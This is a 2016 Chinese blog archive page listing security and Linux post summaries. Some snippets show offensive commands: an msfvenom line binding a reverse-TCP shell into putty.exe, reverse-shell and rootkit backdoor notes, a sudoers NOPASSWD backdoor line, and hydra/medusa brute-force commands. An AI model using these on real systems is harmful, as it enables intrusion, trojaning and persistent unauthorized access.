ssooking

2016年11月19日

摘要：后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有：t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Rootkits，是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。URL: 阅读全文

posted @ 2016-11-19 19:48 ssooking 阅读(7875) 评论(0) 推荐(0) 编辑

kali客户端攻击

摘要：浏览器攻击 browser_autpwn2 （BAP2）窃取浏览器登录凭证root@bt:# service apache2 startroot@bt:# setoolkit Office ms10_087漏洞，执行自定义的exe文件 root@kali:~# cd /root/.msf4/loc 阅读全文

posted @ 2016-11-19 19:47 ssooking 阅读(1395) 评论(0) 推荐(0) 编辑

2016年11月18日

经典的机器学习方面源代码库（非常全，数据挖掘，计算机视觉，模式识别，信息检索相关领域都适用的了）

摘要：今天给大家介绍一下经典的开源机器学习软件：编程语言：搞实验个人认为当然matlab最灵活了（但是正版很贵），但是更为前途的是python（numpy+scipy+matplotlib)和C/C++，这样组合既可搞研究，也可搞商业开发，易用性不比matlab差，功能组合更为强大，个人认为，当然R和j 阅读全文

posted @ 2016-11-18 11:52 ssooking 阅读(241) 评论(0) 推荐(0) 编辑

国外人工智能界牛人主页

摘要：转载自：http://caiqi1123.blog.163.com/blog/static/5736178120080213836366/ 转载自：http://caiqi1123.blog.163.com/blog/static/5736178120080213836366/ 转载自：http:/ 阅读全文

posted @ 2016-11-18 11:50 ssooking 阅读(519) 评论(0) 推荐(0) 编辑

常用牛人主页链接（计算机视觉、模式识别、机器学习相关方向,陆续更新。。。。）

摘要：牛人主页（主页有很多论文代码） Serge Belongie at UC San Diego Antonio Torralba at MIT Alexei Ffros at CMU Ce Liu at Microsoft Research New England Vittorio Ferrari a 阅读全文

posted @ 2016-11-18 11:46 ssooking 阅读(576) 评论(0) 推荐(0) 编辑

metasploit nessus & db_autopwn

摘要： nessus官网：https://www.tenable.com/products/nessus-vulnerability-scanner 下载地址：https://www.tenable.com/products/nessus/select-your-operating-system 安装启动阅读全文

posted @ 2016-11-18 11:05 ssooking 阅读(1113) 评论(0) 推荐(0) 编辑

2016年11月17日

Payload Inject And Fake

摘要：常见捆绑注入payload手法 Payload捆绑注入 msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -x putty.exe -k -e x86/shikata_ga_ 阅读全文

posted @ 2016-11-17 22:22 ssooking 阅读(1631) 评论(0) 推荐(0) 编辑

无线hacking系统—wifislax

摘要：简介官方中文网站： http://wifislax.cn/ WiFiSlax 是在Slax基础上定制出来的，由西班牙开发。它包含了各种各样的安全和诊断工具。该发行主要的成名原因是把各种各样的非官方网络驱动程序集成进Linux内核，从而能为大量的有线和无线网卡提供即刻可用的支持。各项性能优于cdli 阅读全文

posted @ 2016-11-17 21:21 ssooking 阅读(6995) 评论(0) 推荐(0) 编辑

2016年11月16日

Nmap

摘要：常用主机扫描高级用法导出结果脚本扫描 nmap的脚本默认目录为：/usr/share/nmap/scripts/ nmap -sC IP //默认的脚本扫描，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击 nmap --script=vuln IP //扫描常见漏洞利用Nm 阅读全文

posted @ 2016-11-16 21:42 ssooking 阅读(1046) 评论(0) 推荐(0) 编辑

利用强大的搜索引擎检索信息

摘要： Google Hacking 参数详解 google hacking 应用举例 Shodan Hacking ZoomEye (钟道之眼）应用举例小技巧：突破封锁检索想要下载的类型文件语法： index of /。。。相关内容 shodan服务器安全审计 http://www.freebu 阅读全文

posted @ 2016-11-16 19:51 ssooking 阅读(3254) 评论(0) 推荐(0) 编辑

2016年11月15日

Mediawiki随笔

摘要： http://www.ibm.com/developerworks/cn/opensource/os-mediawiki/ 定制wiki http://www.zzbaike.com/wiki/MediaWiki基础设置修改左侧导航栏字体大小，行距 vim ./skins/vector/compo 阅读全文

posted @ 2016-11-15 13:13 ssooking 阅读(163) 评论(0) 推荐(0) 编辑

2016年11月14日

暴力破解

摘要： SMB: enum -D -u administrator -f passwords.txt 服务器名 FTP： medusa -H ip.txt -U user.txt -P passwd.txt -M ftp hydra -l 用户名 -P 密码字典 -e ns -vV IP ftp hydra 阅读全文

posted @ 2016-11-14 22:38 ssooking 阅读(1951) 评论(0) 推荐(0) 编辑

2016年11月12日

Commix命令注入漏洞利用

摘要：介绍项目地址：https://github.com/stasinopoulos/commix Commix是一个使用Python开发的漏洞测试工具，这个工具是为了方便的检测一个请求是否存在命令注入漏洞，并且对其进行测试，在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测，大大提高了阅读全文

posted @ 2016-11-12 20:42 ssooking 阅读(5163) 评论(0) 推荐(0) 编辑

2016年11月11日

漏洞扫描

摘要：主机扫描 MS08067 ：--script=smb-vuln-ms08-067 MS-17-010：--script=smb-vuln-ms17-010 主机服务扫描路由设备 Web扫描 nikto.pl -h 10.100.100.10 扫描主机10.100.100.10的80口上的WEB 阅读全文

posted @ 2016-11-11 22:28 ssooking 阅读(2122) 评论(0) 推荐(1) 编辑

信息搜集神器

摘要： discover https://github.com/leebaird/discover 使用举例 recon-ng 使用方法： http://www.freebuf.com/articles/web/7385.html recon-ng > use recon/domains-hosts/bin 阅读全文

posted @ 2016-11-11 22:26 ssooking 阅读(459) 评论(0) 推荐(0) 编辑

2016年11月10日

peepingtom

摘要：简介辅助评判网页渗透价值的自动化工具。它可以对制定IP和指定端口的所有http(s)服务进行快照，以一种易于浏览阅读的方式展示出来。安装 git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git 官方手册：https://bitbuck 阅读全文

posted @ 2016-11-10 19:12 ssooking 阅读(1357) 评论(0) 推荐(0) 编辑

2016年11月9日

自动化安装一些渗透工具的脚本

摘要： #!/bin/bash echo "" echo "==========================================================================" echo "= Pentest Attack Machine Setup =" echo "= Based o... 阅读全文

posted @ 2016-11-09 22:04 ssooking 阅读(1266) 评论(0) 推荐(0) 编辑

2016年11月7日

代理转发

只有注册用户登录后才能阅读该文。阅读全文

posted @ 2016-11-07 16:19 ssooking 阅读(161) 评论(0) 推荐(0) 编辑

2016年11月6日

MITMF

摘要：一. 安装项目地址：https://github.com/byt3bl33d3r/MITMf 需要自行手动安装python-nfqueue，pefile模块这样，我们就可以正常使用 mitmf 了sudo mitmf (一定要使用root权限运行) 下面简要介绍几个MITMf的基础功能，更多扩展阅读全文

posted @ 2016-11-06 22:19 ssooking 阅读(3378) 评论(0) 推荐(0) 编辑

Xssf配合metaspolit使用

摘要：安装xssf download: svn export http://xssf.googlecode.com/svn/trunk /home/User/xssf install: svn export http://xssf.googlecode.com/svn/trunk ./ --force 连阅读全文

posted @ 2016-11-06 21:38 ssooking 阅读(371) 评论(0) 推荐(0) 编辑

Beef安装与简单使用

摘要：安装 Debian / Ubuntu 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscrip 阅读全文

posted @ 2016-11-06 21:34 ssooking 阅读(22388) 评论(1) 推荐(1) 编辑

2016年11月5日

Linux安全检测常用方法

摘要：一. 系统状态备份主要是网络、服务、端口、进程等状态信息的备份工作二. 断开和限制对外连接三. 进程查看定位导致高流量的进程, 然后通过它的行为, 分析是否是黑客挂的马 iftop -nP 查看流量情况如先用iptraf-ng查下，如果UDP包发的很多，基本都被人装了后门 kill 终止进阅读全文

posted @ 2016-11-05 23:45 ssooking 阅读(4948) 评论(0) 推荐(0) 编辑

2016年10月31日

cobaltstrike3.8服务器搭建及使用

摘要：参考链接： cobalt strike从3.0 开始，不再依赖于Metasploit框架而是作为一个独立的平台使用。本次服务器搭建过程使用cobaltstrike3.8。3.0之前的版本，teamserver搭建过程则需要安装配置msf，这里不在赘述。一、服务器Teamserver搭建（1）团队阅读全文

posted @ 2016-10-31 20:57 ssooking 阅读(19235) 评论(0) 推荐(2) 编辑

2016年10月20日

一些Wifi破解姿势

摘要： wlan0：无线网卡设备 BSSID/AP's MAC：目标路由器的mac地址 Client's MAC：连接到此wifi客户端的mac地址 ESSID：这个无线的名字大致思路：相关命令无线网卡开启混杂模式 ifconfig wlan0 down iwconfig wlan0 mode mon 阅读全文

posted @ 2016-10-20 21:57 ssooking 阅读(22508) 评论(0) 推荐(0) 编辑

2016年10月18日

我的linux云服务器配置记录

摘要：配置vps的时候，随手记录一下~~ 添加一些源： vi /etc/apt/sources.list 另外一些更新安装mysql：apt-get install mysql-server mysql-client 安装php： apt-get install php5 php5-mysql php 阅读全文

posted @ 2016-10-18 21:32 ssooking 阅读(2251) 评论(0) 推荐(0) 编辑

2016年10月15日

Java反序列化漏洞分析

摘要：相关学习资料目录背景 2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客，阐述了利用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例，各大Java Web Server纷纷躺枪，阅读全文

posted @ 2016-10-15 00:35 ssooking 阅读(39359) 评论(2) 推荐(15) 编辑

2016年10月12日

Linux下RTL-SDR基础环境安装

摘要：安装 cmake and libusb 安装 RTL-SDR 安装gnuradio kali已经自带，用 "apt-cache policy gnuradio-dev" 可以查看版本 Linux系其他用户可以执行一下脚本安装：添加qgrx(一个不错的rtl-sdr GUI前端)的源 (详见http 阅读全文

posted @ 2016-10-12 19:45 ssooking 阅读(6195) 评论(0) 推荐(0) 编辑

2016年10月10日

Kali Rolling 下利用rtl-sdr跟踪飞机路线

摘要：环境 kali rolling 状态：未升级发行版，仅用 "apt-get upgrade " 命令更新了软件原料 RTL-SDR电视棒一个，芯片是RTL2832U 原理我国民航飞机的通讯频率为1090MHz，电视棒（RTL2832U+R820T）接收的频率范围为 24 ~ 1766 MHz 一阅读全文

posted @ 2016-10-10 22:39 ssooking 阅读(7479) 评论(0) 推荐(0) 编辑

RTL-SDR简单介绍

摘要： Sdr 软件定义的无线电(Software Defined Radio，SDR) 是一种无线电广播通信技术，它基于软件定义的无线通信协议而非通过硬连线实现。 Rtl-sdr 原身是Realtek RTL2832U（瑞昱的一款电视棒）。基于 realtek瑞昱(也称螃蟹)RTL2832U 芯片的USB 阅读全文

posted @ 2016-10-10 12:47 ssooking 阅读(9802) 评论(0) 推荐(1) 编辑

2016年10月9日

linux反弹shell

摘要：参考链接拓展阅读 linux设置启动执行命令：http://www.cnblogs.com/ssooking/p/6094740.html 反弹IP：10.0.0.1 监听端口：1234 Bash [shell有时由bash解析有时由sh解析，不一定百发百中] 注：/dev/[tcp|upd]/h 阅读全文

posted @ 2016-10-09 10:11 ssooking 阅读(2010) 评论(0) 推荐(0) 编辑

2016年10月8日

Linux后门账户控制

摘要：赋予用户sudo权限 vi /etc/sudoers 添加如下一行： USER ALL=(ALL) NOPASSWD: ALL （实现当前用户允许转换成任意用户及执行任意命令）添加root权限账户 (1)命令添加法创建帐号：# useradd [-u UID] [-g GID] [-d HOME 阅读全文

posted @ 2016-10-08 18:15 ssooking 阅读(1778) 评论(0) 推荐(0) 编辑

2016年10月7日

linux下文件搜索

摘要：常用 grep -nr "关键字" 搜索当前目录下所有匹配关键字的文件 grep -nr "关键字" *php 搜索当前目录下所有匹配关键字的php文件 find -name '*.php'|xargs grep 'Hello!' 搜索当前目录下所有匹配关键字"Hello!"的php文件替换文件内阅读全文

posted @ 2016-10-07 12:04 ssooking 阅读(363) 评论(0) 推荐(0) 编辑

2016年10月1日

linux下串口通信与管理

摘要： linux下的串口与windows有一些区别，下面将介绍一下linux下串口通信管理 linux下的串口与windows有一些区别，下面将介绍一下linux下串口通信管理 linux下的串口与windows有一些区别，下面将介绍一下linux下串口通信管理查看是否支持USB串口： #lsmod | 阅读全文

posted @ 2016-10-01 22:30 ssooking 阅读(9445) 评论(0) 推荐(1) 编辑

用VulApps快速搭建各种漏洞环境

摘要：项目主页 https://github.com/Medicean/VulApps 项目介绍收集各种漏洞环境，统一采用 Dockerfile 形式。DockerHub 在线镜像地址获取并使用相关镜像直接使用 docker 命令拉取相关镜像，并启动。需要查看相关环境的 tag 如果获取速度慢，推荐阅读全文

posted @ 2016-10-01 14:41 ssooking 阅读(992) 评论(0) 推荐(0) 编辑

2016年9月25日

Ubuntu下NFS，TFTP服务搭建

摘要：环境：Ubuntu 一. 搭建NFS服务器（1）安装： sudo apt-get install nfs-kernel-server #安装NFS服务器端 sudo apt-get install nfs-common #安装NFS客户端（2）添加NFS共享目录 1)创建共享文件夹，如/nfsr 阅读全文

posted @ 2016-09-25 18:39 ssooking 阅读(276) 评论(0) 推荐(0) 编辑

2016年9月24日

命题逻辑重要知识点笔记

摘要： ^ : 合取联结词。p^q，命题p,q同时为真 : 析取联结词。 pq，命题p,q至少有一个为真 →：蕴含联结词。p→q，"如果p，则q","只有q,才p"。q是p的必要条件 ↔：等价联结词。p↔q，"p↔q为真当且仅当p与q同时为为真或为假"。q和p互为充要条件。（重言式）注：这个联结词要与 < 阅读全文

posted @ 2016-09-24 22:36 ssooking 阅读(701) 评论(0) 推荐(0) 编辑

2016年9月23日

实验吧Web-PHP大法

摘要：链接： http://www.shiyanbar.com/ctf/54 页面情况阅读全文

posted @ 2016-09-23 19:32 ssooking 阅读(4149) 评论(2) 推荐(2) 编辑

概率论与数理统计

posted @ 2016-09-23 15:14 ssooking 阅读(352) 评论(0) 推荐(0) 编辑

Linux安全审计命令

摘要：安全审计数据分析 capinfos xxx.pcap 产看数据包基本信息日志分析 who /var/log/wtmp #查看登录用户信息哈希校验 sha265 文件名 md5sum 文件名 > hash.txt 然后把hash.txt与源文件放在一个文件夹 md5sum -c hash.txt #将hash.txt中的hash值与源文... 阅读全文

posted @ 2016-09-23 15:11 ssooking 阅读(3206) 评论(0) 推荐(0) 编辑

渗透命令总结--信息搜集

摘要：服务探测 google搜索密码相关语法摘自：http://blog.csdn.net/jeanphorn/article/details/44907737 相关阅读：工具：maltego，wydomain，subdomain，discover，recon-ng，dmitry discover，r 阅读全文

posted @ 2016-09-23 14:58 ssooking 阅读(2499) 评论(0) 推荐(0) 编辑

Loading

公告